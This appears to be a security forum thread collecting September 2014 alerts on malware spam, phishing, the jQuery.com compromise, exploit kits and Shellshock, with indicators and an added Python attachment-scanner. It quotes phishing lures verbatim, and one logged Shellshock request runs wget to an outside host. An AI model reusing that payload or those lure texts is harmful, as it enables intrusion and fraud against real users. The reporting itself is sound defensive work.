Fake 'Voice Mail' SPAM ...
FYI...
Fake 'Voice Mail' SPAM
- http://blog.dynamoo.com/2014/09/acco...-have-new.html
23 Sep 2014 - "This strangely titled spam leads to malware.
From: Voice Mail
Date: 23 September 2014 10:17
Subject: You have a new voice
You are receiving this message because we were unable to deliver it, voice message did not go through because the voicemail was unavailable at that moment.
* The reference number for this message is _qvs8213783583_001
The transmission length was 78
Receiving machine ID : R8KU-UY0G3-ONGH
To download and listen your voice mail please follow the link ...
The link to this secure message will expire in 24 hours ...
The link in the email downloads a file from www .ezysoft .in/ocjnvzulsx/VoiceMail.zip which contains a malicious executable VoiceMail.scr which has a VirusTotal detection rate of 2/54*. According to this Anubis report** the malware attempts to phone home to very-english .co.uk which might be worth blocking."
* https://www.virustotal.com/en-gb/fil...is/1411464313/
** http://anubis.iseclab.org/?action=re...7a&format=html
- http://myonlinesecurity.co.uk/new-vo...e-pdf-malware/
23 Sep 2014 - "... 23 Sep 2014: VoiceMail.zip (9kb): Extracts to: VoiceMail.scr Current Virus total detections: 2/54*
* https://www.virustotal.com/en-gb/fil...is/1411464313/
___
jQuery.com compromised to serve malware via drive-by download
- http://www.net-security.org/malware_news.php?id=2869
23.09.2014 - "jQuery.com, the official website of the popular cross-platform JavaScript library of the same name, had been compromised and had been -redirecting- visitors to a website hosting the RIG exploit kit and, ultimately, delivering information-stealing malware. While any website compromise is dangerous for users, this one is particularly disconcerting because of the demographic of its users... The attack was first detected on September 18, and given that the malicious redirector was hosted on a domain that was registered on the same day, it's more than likely that that was the day when the attack actually started. RiskIQ researchers* have immediately notified the jQuery Foundation about the compromise, and the site's administrators have -removed- the malicious script. The bad news is that they still don't know how the compromise happened, so it just might happen again. Users who have visited the site on or around September 18 are advised to check whether they have been compromised by the malware. The researchers recommend immediately re-imaging of the system, resetting passwords for user accounts that have been used on it, and checking whether suspicious activity has originated from it (data exfiltration, etc.). The only good news in all of this is that there is no indication that the jQuery library was affected."
* http://www.riskiq.com/resources/blog...-accounts-risk
>> https://blog.malwarebytes.org/?s=RIG+exploit+kit
- https://isc.sans.edu/diary.html?storyid=18699
2014-09-23
46.182.31.77: https://www.virustotal.com/en/ip-add...7/information/
___
Nuclear Exploit Kit evolves, includes Silverlight Exploit
- http://blog.trendmicro.com/trendlabs...light-exploit/
Sep 23, 2014 - "... We observed that the Nuclear Exploit Kit recently included the Silverlight exploit (CVE-2013-0074*) in its scope. We believe that the attackers behind the Nuclear Exploit Kit included Silverlight in its roster of targeted software for two reasons: to have an expanded attack surface and to avoid detection (as not many security solutions have detections for this particular exploit)... This particular exploit has also been used in other exploit kits, such as the Angler Exploit Kit... Microsoft has released a bulletin (Microsoft Security Bulletin MS13-022) to address the associated vulnerability... The number of exploits used by the kit has -doubled- since the start of 2014...
Timeline of exploits used by the Nuclear Exploit Kit:
> http://blog.trendmicro.com/trendlabs...imeline-01.jpg
Vulnerabilities targeted by the current Nuclear Exploit Kit:
> http://blog.trendmicro.com/trendlabs...ploit_fig4.png
... patches have already been released for the vulnerabilities targeted by the Nuclear Exploit Kit..."
* https://web.nvd.nist.gov/view/vuln/d...=CVE-2013-0074 - 9.3 (HIGH)
:mad: :fear::fear:
Fake BankLine, Voice mail, Invoice SPAM, AMEX Phish ...
FYI...
Fake BankLine SPAM
- http://blog.dynamoo.com/2014/09/you-...e-message.html
24 Sep 2014 - "This -fake- BankLine email leads to malware that is not currently detected by any anti-virus engine:
From: Bankline [secure.message@ bankline .com]
Date: 24 September 2014 09:59
Subject: You have received a new secure message from BankLine
You have received a secure message.
Read your secure message by following the link bellow ...
You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the Bankline Bank Secure Email Help Desk ...
First time users - will need to register after opening the attachment...
The link in the email goes to ismashahalam .net/xyzpayohjx/ngkzoeqjjs.html which downloads an archive file from ismashahalam .net/xyzpayohjx/SecureMessage.zip. This in turn contains a malicious file SecureMessage.scr which has a VirusTotal detection rate of 0/50*. The Anubis report** shows that the malware phones home to very-english .co.uk which is worth blocking or monitoring."
* https://www.virustotal.com/en-gb/fil...is/1411546325/
** https://anubis.iseclab.org/?action=r...ef&format=html
- http://myonlinesecurity.co.uk/receiv...e-pdf-malware/
24 Sep 2014 - "... 24 Sep 2014: SecureMessage.zip: Extracts to: SecureMessage.scr
Current Virus total detections: 7/54*..."
* https://www.virustotal.com/en/file/2...is/1411565004/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-add...1/information/
___
Fake Voice mail SPAM
- http://myonlinesecurity.co.uk/inclar...e-wav-malware/
24 Sep 2014 - "'Voice Message Attached from 01636605058 – name unavailable' pretending to come from voicemail@ inclarity .net is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Time: Sep 23, 2014 10:50:00 AM
Click attachment to listen to Voice Message
24 September 2014: 01636605058_20140919_105000.wav.zip: Extracts to: 01636605058_20140919_105000.wav.exe
Current Virus total detections: 12/53*
This 'Voice Message Attached from 01636605058 – name unavailable' is another one of the spoofed icon files that unless you have "show known file extensions enabled", will look like a proper wav (sound) file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/4...is/1411568872/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-add...1/information/
___
Fake 'overdue invoice' SPAM – malware
- http://myonlinesecurity.co.uk/remind...voice-malware/
24 Sep 2014 - "'Reminder of overdue invoice' pretending to come from a random name at a random company and with a random named attachment is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... different subjects with this one having different numbers including:
Reminder of overdue invoice: 708872110964932
Overdue Payment: 122274492356288
Due Date E-Mail Reminder: 417785972641224
Payment reminder: 461929101577209
Past Due Reminder Letter: 199488661953143
Bills Reminder: 325332051074690
Automatic reminder: 676901889653218
Late payment: 475999033756578
Reminder: 215728756825356
The email looks like:
Hello,
This is Rex from Olympus Industrial. After a review of our records, we have found your account is past due.
Account ID: 5FCDMF9. This notice is a reminder your payment is due.
Regards,
Rex Gloeckler
Olympus Industrial...
24 September 2014: application_708872110964932_5FCDMF9.rar:
Extracts to: application_708872110964932_5FCDMF9.exe
Current Virus total detections: 3/54* . This is another one of the spoofed icon files that unless you have "show known file extensions enabled", will look like a file with a red £ sign instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/d...is/1411570178/
... Behavioural information
TCP connections
157.56.96.53: https://www.virustotal.com/en/ip-add...3/information/
213.186.33.19: https://www.virustotal.com/en/ip-add...9/information/
95.101.0.97: https://www.virustotal.com/en/ip-add...7/information/
213.186.33.17: https://www.virustotal.com/en/ip-add...7/information/
195.60.214.11: https://www.virustotal.com/en/ip-add...1/information/
___
Fake AMEX Phish - 'Home Depot Security concern'
- http://myonlinesecurity.co.uk/americ...epot-phishing/
24 Sep 2014 - "We are seeing quite a few American Express phishing attempts trying to get your American Express details. These are very well crafted and look identical to genuine American Express emails. The senders appear to be from American Express until you look carefully at the email headers. Do -not- click -any- links in these emails... Today’s version is the 'American Express – Security concern on Data breach at Home Depot' which is a change to previous versions to attempt to make it more believable and attractive for you to click the link & give your details. They are using the recent Home Depot hack and consequent fraudulent transactions* that are being taken from many victims accounts to scare you into ignoring the usual precautions and get you to give them your details:
* http://www.cnbc.com/id/102027452
Email looks like:
[ AMEX logo ]
Dear Customer:We are writing to you because we need to speak with you regarding a security concern on your account. The Home Depot recently reported that there was unauthorized access to payment data systems at its U.S. stores. American Express has put fraud controls in place and we continue to closely monitor the situation. Our records indicate that you recently used your American Express card on September 19, 2014.
We actively monitor accounts for fraud, and if we see unusual activity which may be fraud, our standard practice is to immediately contact our Card Members. There is no need to call us unless you see suspicious activity on your account.
To ensure the safety of your account , please log on to : ...
Regularly monitor your transactions online at americanexpress .com. If you notice fraudulent transactions, visit our online Inquiry and Dispute Center
Enroll in Account Alerts that notify you via email or text messages about potentially fraudulent activities.
Switch to Paperless Statements that are accessible online through your password-protected account.
Your prompt response regarding this matter is appreciated.
Sincerely,
American Express Identity Protection Team ...
Following the link in this 'American Express – Security concern on Data breach at Home Depot' or other -spoofed- emails takes you to a website that looks -exactly- like the real American Express site. You are then led through loads of steps to input a lot of private and personal information. Not only will this information enable them to clear out & use your American Express account, but also your Bank Account, Email details, webspace (if you have it) They then want enough information to completely impersonate you and your identity not only in cyberspace but in real life. Please read our How to protect yourselves page** for simple, sensible advice on how to avoid being infected or having your details stolen by this sort of socially engineered malware..."
** http://myonlinesecurity.co.uk/how-to...hten-security/
- http://threattrack.tumblr.com/post/9...dentials-phish
Sep 24, 2014
Screenshot: https://gs1.wac.edgecastcdn.net/8019...PiQ1r6pupn.png
Tagged: AMEX, American Express, Home Depot, Credentials Phish
___
Netcraft Sep 2014 Web Server Survey
- http://news.netcraft.com/archives/20...er-survey.html
24 Sep 2014 - "In the September 2014 survey we received responses from 1,022,954,603 sites — nearly 31 million more than last month. This is the first time the survey has exceeded a -billion- websites, a milestone achievement that was unimaginable two decades ago. Netcraft's first ever survey was carried out over 19 years ago in August 1995. That survey found only 18,957 sites, although the first significant milestone of one million sites was reached in less than two years, by April 1997..."
___
Viator(dot)com - Data Compromise ...
- https://blog.malwarebytes.org/online...-you-affected/
Sep 23, 2014 - "You may well be seeing an email appearing in your inbox from Viator .com, a website designed to help you find tours and trips overseas with none of the typical messing about such tasks usually involve. The emails have been sent out because it appears they had a breach* and anything up to 1.4 million customers may have been potentially impacted by the compromise...
* http://www.viator.com/about/media-ce...leases/pr33251
Sep 19, 2014
... the bad news is that the breach took place a good few weeks ago yet we’re only just hearing about it... there doesn’t appear to have been a massive file posted online yet containing data such as PII related to the compromise... we await more information on this latest high-profile attack."
___
Malvertising campaign - involving DoubleClick and Zedo
- https://blog.malwarebytes.org/malver...lick-and-zedo/
Sep 18, 2014
"Update (09/19/14 9:20 AM PT): It appears that the malicious redirection has stopped. Last activity was detected by our honeypots around midnight last night, and nothing else since then. We are still monitoring the situation and will update here if necessary."
- http://arstechnica.com/security/2014...ched-millions/
Sep 22 2014
:mad: :fear:
Fake Bank transfers/invoice SPAM ...
FYI...
Fake Bank transfers/invoice SPAM ...
- http://blog.dynamoo.com/2014/09/malw...sfer-sage.html
25 Sep 2014 - "... very aggressive spam run this morning, with at least -four- different email formats pushing the -same- malicious download.
RBS / Riley Crabtree: "BACS Transfer : Remittance for JSAG814GBP"
From: Riley Crabtree [creditdepart@ rbs .co.uk]
Date: 25 September 2014 10:58
Subject: BACS Transfer : Remittance for JSAG814GBP
We have arranged a BACS transfer to your bank for the following amount : 4946.00
Please find details at our secure link ...
Sage Account & Payroll: "Outdated Invoice"
From: Sage Account & Payroll [invoice@ sage .com]
Date: 25 September 2014 10:53
Subject: Outdated Invoice
Sage Account & Payroll
You have an outdated invoice from Sage Accounting that is ready for payment. To find out more details on this invoice, please follow the link ...
Screenshot: https://1.bp.blogspot.com/-8Mx-CTYIi...1600/sage2.png
Lloyds Commercial Bank: "Important - Commercial Documents"
From: Lloyds Commercial Bank [secure@ lloydsbank .com]
Date: 25 September 2014 11:36
Subject: Important - Commercial Documents
Important account documents
Reference: C400
Case number: 05363392
Please review BACs documents.
Click link below ...
NatWest Invoice: "Important - New account invoice"
From: NatWest Invoice [invoice@ natwest .com]
Date: 25 September 2014 10:28
Subject: Important - New account invoice
Your latest NatWest invoice has been uploaded for your review. If you have any questions regarding this invoice, please contact your NatWest service team at the number provided on the invoice for assistance.
To view/download your invoice please click here ...
The links in the emails go to different download locations to make it harder to block... In each case the page then prompts the victim to download the file Invoice_09252014.zip from the same directory as the html file. This ZIP file contains a malicious executable Invoice_09252014.scr which currently has a VirusTotal detection rate of 3/54*. The Anubis report shows that it phones home to ukrchina-logistics .com which is probably worth blocking or monitoring access to."
* https://www.virustotal.com/en-gb/fil...is/1411638249/
... Behavioural information
DNS requests
ukrchina-logistics .com
TCP connections
188.165.198.52: https://www.virustotal.com/en-gb/ip-...2/information/
91.196.0.119
- http://threattrack.tumblr.com/post/9...e-invoice-spam
Sep 25, 2014
Screenshot: https://gs1.wac.edgecastcdn.net/8019...1ql1r6pupn.png
Tagged: Sage, Upatre
___
Fake BCA SPAM - PDF malware
- http://myonlinesecurity.co.uk/bca-ba...e-pdf-malware/
25 Sep 2014 - "'BCA Banking 24.09.14' pretending to come from hallsaccounts <hallsaccounts@ hallsgb .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Accounts Dept
Halls Holdings Ltd
Tel: 01743 450700
Fax: 01743 443759 ...
25 September 2014: BCA Banking 24.09.14.pdf.zip : Extracts to: BCA Banking 24.09.14.pdf.exe
Current Virus total detections: 4/53* . This BCA Banking 24.09.14 is another one of the spoofed icon files that unless you have "show known file extensions enabled", will look like an image of a barcode to try to fool you instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/c...is/1411646762/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-add...1/information/
___
Fake voice mail SPAM – wav malware
- http://myonlinesecurity.co.uk/outloo...e-wav-malware/
25 Sep 2014 - "'You have received a voice mail' pretending to come from Microsoft Outlook [no-reply@ Your domain] is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
You received a voice mail : VOICE7838396453.wav (26 KB)
Caller-Id: 7838396453
Message-Id: ID9CME
Email-Id: [redacted]
This e-mail contains a voice message.
Download and extract the attachment to listen the message.
Sent by Microsoft Exchange Server
25 September 2014 VOICE7838396453.zip (56kb): Extracts to: voicemessage.scr
Current Virus total detections: 1/55* . This is another one of the spoofed icon files that unless you have "show known file extensions enabled", will look like a proper wav (sound) file instead of the .scr file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/c...is/1411657167/
... Behavioural information
TCP connections
23.21.52.195: https://www.virustotal.com/en/ip-add...5/information/
95.100.255.137: https://www.virustotal.com/en/ip-add...7/information/
194.150.168.70: https://www.virustotal.com/en/ip-add...0/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-add...1/information/
___
Fake Gov't e-mail SCAM
- https://www.ic3.gov/media/2014/140924.aspx
Sep 24, 2014 - "Cybercriminals posing as Internet Crime Complaint Center (IC3) employees are defrauding the public. The IC3 has received complaints from victims who were receiving e-mails purported to be from the IC3... Victims report that the unsolicited e-mail sender is a representative of the IC3. The e-mails state that a criminal report was filed on the victim’s name and social security number and legal papers are pending. Scammers impersonate an IC3 employee to increase credibility and use threats of legal action to create a sense of urgency. Victims are informed they have one to two days from the date of the complaint to contact the scammers. Failure to respond to the e-mail will result in an arrest warrant issued to the victim. Some victims stated they were provided further details regarding the ‘criminal charges’ to include violations of federal banking regulations, collateral check fraud, and theft deception. Other victims claimed that their address was correct but their social security number was incorrect. Victims that requested additional information from the scammer were instructed to obtain prepaid money cards to avoid legal action. Victims have reported this -scam- in multiple states... If you receive this type of e-mail:
- Resist the pressure to act quickly.
- -Never- wire money based on a telephone request or in an e-mail, especially to an overseas location.
The IC3 -never- charges the public for filing a complaint and will -never- threaten to have them arrested if they do not respond to an e-mail..."
:fear::fear: :mad:
Amazon phish, Fake docs, voicemail, fax SPAM ...
FYI...
Amazon phish ...
- http://myonlinesecurity.co.uk/amazon...tion-phishing/
26 Sep 2014 - "'Account Confirmation' pretending to come from Amazon .co.uk <auto-confirm@ amazon .co.uk> is a phishing email designed to get your Amazon log in details and then your bank, credit card, address and personal details so they can imitate you and take over your accounts and clean you out...
Screenshot: http://myonlinesecurity.co.uk/wp-con...nfirmation.png
Following the link in this Amazon Account Confirmation or other spoofed emails takes you to a website that looks -exactly- like the real Amazon.co.uk site. You are then led through loads of steps to input a lot of private and personal information. Not only will this information enable them to clear out & use your Amazon account, but also your Bank Account, Email details, webspace (if you have it). They then want enough information to completely impersonate you and your identity not only in cyberspace but in real life. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email or follow links in them ..."
___
Fake docs, voicemail, fax SPAM ...
- http://blog.dynamoo.com/2014/09/malw...documents.html
26 Sep 2014 - "... different types of spam to increase click through rates and now some tricky tools to prevent analysis of the malware.
Employee Documents - Internal Use
From: victimdomain
Date: 26 September 2014 09:41
Subject: Employee Documents - Internal Use
DOCUMENT NOTIFICATION, Powered by NetDocuments
DOCUMENT NAME: Employee Documents ...
Documents are encrypted in transit and store in a secure repository...
You have a new voice
From: Voice Mail [Voice.Mail@ victimdomain]
Date: 26 September 2014 09:30
Subject: You have a new voice
You are receiving this message because we were unable to deliver it, voice message did not go through because the voicemail was unavailable at that moment.
* The reference number for this message is _qvs4004011004_001
The transmission length was 26
Receiving machine ID : ES7D-ZNA1D-QF3E
To download and listen your voice mail please follow the link ...
RBS: BACS Transfer : Remittance for JSAG244GBP
From: Douglas Byers [creditdepart@ rbs .co.uk]
Date: 26 September 2014 10:12
Subject: BACS Transfer : Remittance for JSAG244GBP
We have arranged a BACS transfer to your bank for the following amount : 4596.00
Please find details at our secure link ...
New Fax
From: FAX Message [fax@victimdomain]
Date: 26 September 2014 10:26
Subject: New Fax
You have received a new fax .
Date/Time: Fri, 26 Sep 2014 16:26:36 +0700.
Your Fax message can be downloaded here ...
... The attack has evolved recently.. usually these malicious links forwarded on to another site which had the malicious payload. Because all the links tended to end up at the same site, it was quite easy to block that site and foil the attack. But recently the payload is spread around many different sites making it harder to block. A new one today is that the landing page is somewhat obfuscated to make it harder to analyse, and this time the download is a plain old .scr file rather than a .zip. I've noticed that many anti-virus products are getting quite good at detecting the malicious ZIP files with a generic detection, but not the binary within. By removing the ZIP wrapper, the bad guys have given one less hook for AV engines to find.. malicious binary document7698124-86421_pdf.scr is downloaded from the remote site which has a VirusTotal detection rate of 2/55*. The Anubis report shows the malware attempting to phone home to padav .com which is probably worth blocking."
* https://www.virustotal.com/en-gb/fil...is/1411724904/
... Behavioural information
DNS requests
padav .com (184.106.55.51)
TCP connections
188.165.198.52: https://www.virustotal.com/en-gb/ip-...2/information/
184.106.55.51: https://www.virustotal.com/en-gb/ip-...1/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en-gb/ip-...1/information/
___
Bill.com Spam
- http://threattrack.tumblr.com/post/9.../bill-com-spam
Sep 26, 2014 - "Subjects Seen:
Payment Details [Incident: 711935-599632]
Typical e-mail details:
We could not process your Full Payment Submission. The submission for reference ***/UT5236489 was successfully received and was not processed. Check attached copy (PDF Document) for more information.
Regards,
Bill.com Payment Operations
Screenshot: https://gs1.wac.edgecastcdn.net/8019...HaW1r6pupn.png
Malicious File Name and MD5:
bill_com_Payment_Details_711935-599632.zip (02EE805D1EACD739BEF4697B26AAC847)
bill_com_payment_details_ID0000012773616632715381235.pdf.exe (AD24CD2E14DCBF199078BDBBAE4BF0CA)
Tagged: bill.com, Vawtrak
___
More Fakes - HMRC, BT, RBS SPAM
- http://blog.dynamoo.com/2014/09/malw...plication.html
26 Sep 2014 - "Another bunch of spam emails, with the same payload* as this earlier spam run*.
HMRC taxes application with reference LZV9 0Q3E W5SD N3GV received
From: noreply@ taxreg .hmrc .gov.uk [noreply@ taxreg .hmrc .gov.uk]
Date: 26 September 2014 12:26
Subject: HMRC taxes application with reference LZV9 0Q3E W5SD N3GV received
The application with reference number LZV9 0Q3E W5SD N3GV submitted by you or your agent to register for HM Revenue & Customs (HMRC) taxes has been received and will now be verified. HMRC will contact you if further information is needed.
Please download/view your HMRC documents here ...
Important - BT Digital File
From: Cory Sylvester [Cory.Sylvester@ bt .com]
Date: 26 September 2014 12:51
Subject: Important - BT Digital File
Dear Customer,
This email contains your BT Digital File. Please scan attached file and reply to this email.
To download your BT Digital File please follow the link ...
RBS Bankline: Outstanding invoice
From: Bankline.Administrator@ rbs .co.uk [Bankline.Administrator@ rbs .co.uk]
To: <REDACTED>
Date: 26 September 2014 13:05
Subject: Outstanding invoice
{_BODY_TXT}
Dear [redacted],
Please find the attached copy invoice which is showing as unpaid on our ledger.
To download your invoice please click here ...
In the sample I looked at the malware page downloaded an archive document26092014-008_pdf.zip which in turn contains document26092014-008_pdf.exe which is the same payload* as earlier..."
* http://blog.dynamoo.com/2014/09/malw...documents.html
___
Fake Barclays SPAM – PDF malware
- http://myonlinesecurity.co.uk/barcla...e-pdf-malware/
26 Sep 2014 - "'Barclays Transaction not complete' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Unable to complete your most recent Transaction. Currently your transaction has a pending status.
If the transaction was made by mistake please contact our customer service.
For more details please download payment receipt ...
26 September 2014: PaymentReceipt262.zip: Extracts to: PaymentReceipt262.exe
Current Virus total detections: 2/55* . This 'Barclays Transaction not complete' is another one of the spoofed icon files that unless you have "show known file extensions enabled", will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/5...is/1411738617/
... Behavioural information
DNS requests
wcdnitaly .org (195.110.124.133)
TCP connections
188.165.198.52: https://www.virustotal.com/en/ip-add...2/information/
195.110.124.133: https://www.virustotal.com/en/ip-add...3/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-add...1/information/
:mad: :fear::fear:
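Several of the posts above describe the same trick: a ZIP attachment whose member is an .exe or .scr carrying a decoy icon and a double extension (.wav.exe, .pdf.exe, .pdf.zip extracting to .pdf.exe), so that with "show known file extensions" turned off the file looks like a sound file, a PDF or a barcode image. The Python below is an added example, not code from myonlinesecurity.co.uk or dynamoo.com, showing how a mail gateway or triage script can flag such attachments before a user sees them: it inspects member names inside an archive for executable and double-extension patterns and cross-checks the first two bytes for the "MZ" PE header. The archive it scans is constructed in memory (fake two-byte "MZ" stubs, not real samples); the extension lists are assumptions chosen for this example, not an exhaustive policy.

```python
import io
import zipfile

# Extensions Windows will execute on double-click (assumption: starter list, not exhaustive).
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "jse", "vbs", "vbe"}
# Extensions the spam runs above impersonate with a spoofed icon (assumption: starter list).
DECOY_EXTS = {"wav", "pdf", "doc", "xls", "jpg", "png", "txt"}


def classify_name(name):
    """Return a list of findings for one file name, judged on its extension(s) only."""
    exts = name.lower().split(".")[1:]          # e.g. "x.wav.exe" -> ["wav", "exe"]
    findings = []
    if exts and exts[-1] in EXECUTABLE_EXTS:
        findings.append("executable")
        # The decoy pattern: a benign-looking extension immediately before the real one.
        if len(exts) >= 2 and exts[-2] in DECOY_EXTS:
            findings.append("double-extension decoy ." + exts[-2] + "." + exts[-1])
    return findings


def scan_zip_bytes(data):
    """Scan an archive held in memory.

    Returns {member_name: [findings]} for members that look executable by name
    or by content (PE files start with the two bytes 'MZ'). Benign members are omitted.
    """
    report = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            findings = classify_name(info.filename)
            with zf.open(info) as member:
                if member.read(2) == b"MZ":
                    findings.append("PE header")
            if findings:
                report[info.filename] = findings
    return report


def build_sample_zip():
    """Constructed sample archive shaped like the ones in the spam runs above.

    The 'MZ' + zeros stubs only imitate a PE header; they are not executables.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("01636605058_20140919_105000.wav.exe", b"MZ" + b"\0" * 62)
        zf.writestr("VoiceMail.scr", b"MZ" + b"\0" * 62)
        zf.writestr("readme.txt", b"harmless text")
    return buf.getvalue()


if __name__ == "__main__":
    for member, findings in scan_zip_bytes(build_sample_zip()).items():
        print(member, "->", ", ".join(findings))
```

The name check alone catches the decoy pattern the posts describe; the "MZ" check catches the variant where a plain .scr is shipped without a ZIP wrapper or where the name has been mangled, so the two are complementary rather than redundant.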
Shellshock and MangoHost (mangohost .net) / 83.166.234.0/24
FYI...
Shellshock and MangoHost (mangohost .net) / 83.166.234.0/24
- http://blog.dynamoo.com/2014/09/evil...mangohost.html
28 Sep 2014 - "I came across this particular sewer while looking in my logs for Shellshock access attempts yesterday... probing my server and attempting to WGET back to their own network to enumerate vulnerable hosts.
dynamoo.com:80 83.166.234.133 - - [27/Sep/2014:03:08:37 +0100] "GET / HTTP/1.0" 200 11044 "-" "() { :;}; /bin/bash -c \"wget -q -O /dev/null http ://ad.dipad .biz/test/http ://dynamoo .com/\""
ad.dipaz .biz is hosted on 83.166.234.186, so pretty close to the probing IP of 83.166.234.133 which made me suspicious of the whole range... MangoHost claims to be in Moldova, but almost everything to do with them is in Russian, indicating perhaps that whoever runs this is part of the large Russian ethnic minority in Moldova*. MangoHost is run by one Victor Letkovski (виктор летковский) who lives in Chisinau. Until the past few days, MangoHost was hosting the -ransomware- sites listed here** [pastebin]. Past customers include the infamous Darkode forum back in June, and indeed it still hosts jab.darkode .com, whatever that may be (you can guarantee it is nothing good). Currently hosted domains include a collection of -fake- browser plugins, some -malvertising- sites, some porn, spam sites, hacker resources, -ransomware- domains and what might appear to be some fake Russian law firms... I would strongly recommend blocking all traffic to and from 83.166.234.0/24 if you can do it."
(More detail at the dynamoo URL above.)
* https://en.wikipedia.org/wiki/Russians_in_Moldova
** http://pastebin.com/2mC1pXaJ
83.166.234.186: https://www.virustotal.com/en/ip-add...6/information/
83.166.234.133: https://www.virustotal.com/en/ip-add...3/information/
___
Shellshock in the Wild
- http://www.fireeye.com/blog/uncatego...-the-wild.html
Sep 27, 2014 - "... We have observed a significant amount of overtly malicious traffic leveraging BASH, including:
- Malware droppers
- Reverse shells and backdoors
- Data exfiltration
- DDoS
Some of this suspicious activity appears to be originating from Russia. We suspect bad actors may be conducting an initial dry run, in preparation for a real, potentially larger-scale attack. We believe it’s only a matter of time before attackers exploit the vulnerability to redirect users to malicious hosts, which can result in further compromise... Exploitation Techniques: The Shellshock traffic we have been able to observe is still quite chaotic. It is largely characterized by high volume automated scans and PoC-like exploit scripts... payload is a very small ELF executable (md5: 959aebc9b44c2a5fdd23330d9be1101e) that was submitted to VirusTotal yesterday with 0 detections. It simply creates a reverse shell, connecting to the same IP the payload was downloaded from: 82.118.242.223... We will continue monitoring the threats and keep you updated..."
(More detail at the fireeye URL above.)
- http://www.symantec.com/connect/blog...-vulnerability
Updated: 29 Sep 2014 - "... Businesses, in particular website owners, are most at risk from this bug and should be aware that its exploitation may allow access to their data and provide attackers with a foothold on their network. Accordingly, it is of critical importance to apply any available patches immediately. Linux vendors have issued security advisories for the newly discovered vulnerability including patching information.
Debian: https://www.debian.org/security/2014/dsa-3032
Ubuntu: http://www.ubuntu.com/usn/usn-2362-1/
Red Hat: https://access.redhat.com/articles/1200223
CentOS: http://centosnow.blogspot.com/2014/0...-centos-5.html
Novell SUSE: http://support.novell.com/security/c...2014-6271.html
*Red Hat has updated its advisory to include fixes for a number of remaining issues.
- https://rhn.redhat.com/errata/RHSA-2014-1306.html
Last updated on: 2014-09-30
If a patch is unavailable for a specific distribution of Linux or Unix, it is recommended that users switch to an alternative shell until one becomes available.
For consumers: Consumers are advised to apply patches to routers and any other web-enabled devices as and when they become available from vendors. Users of Apple’s Mac OS X should be aware that the operating system currently ships with a vulnerable version of Bash. Mac users should apply any patches for OS X when they become available.
Symantec Protection: Symantec has created an Intrusion Prevention signature for protection against this vulnerability:
27907 - OS Attack: GNU Bash CVE-2014-6271
> http://www.symantec.com/security_res...jsp?asid=27907
Symantec will continue to investigate this vulnerability and provide more details as they become available."
Fake SITA, Invoice, Bank SPAM
FYI...
Fake SITA SPAM - PDF malware
- http://myonlinesecurity.co.uk/sita-u...e-pdf-malware/
29 Sep 2014 - "'Remittance Advice !!!' pretending to come from SITA UK < info @sita .co.uk > is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please find attached folder for remittance advice and your outstanding statement from SITA UK.
Please arrange to send over a credit note as indicated in the statement.
Best Regards,
Luis Shivani,
Financial Controller
SITA UK ...
Update: a slightly revised email coming out now but still the -same- malware attachment
Please find attached folder for remittance advice and your outstanding statement from SITA UK.
Please arrange to send over a credit note as indicated in statement.
Any queries please contact us on 01934-524004.
Best Regards,
Luis Shivani,
Financial Controller
SITA UK ...
29 September 2014: Remittance-Advice.zip: Extracts to: Remittance-Advice.exe
Current Virus total detections: 39/55*. This 'Remittance Advice !!!' is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/d...is/1411951945/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-add...1/information/
___
Fake Invoice SPAM - XLS malware
- http://myonlinesecurity.co.uk/invoic...e-xls-malware/
29 Sep 2014 - "'Your Invoice from Complete Office Solutions' pretending to come from donotreply@ c-o-s .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Hi Please find attached your recent invoices/credits from Complete Office Solutions, if you have any queries please do not hesitate in contacting us on 01904 693696 or email on Julie.edkins@ wallisbusinessservices .co.uk
29 September 2014: A Sales Invoice – By Account_SINV0612471.PDF.zip : Extracts to: A Sales Invoice – By Account_SINV0612471.xls.exe
Current Virus total detections: 25/54*. This 'Your Invoice from Complete Office Solutions' is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper excel XLS file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
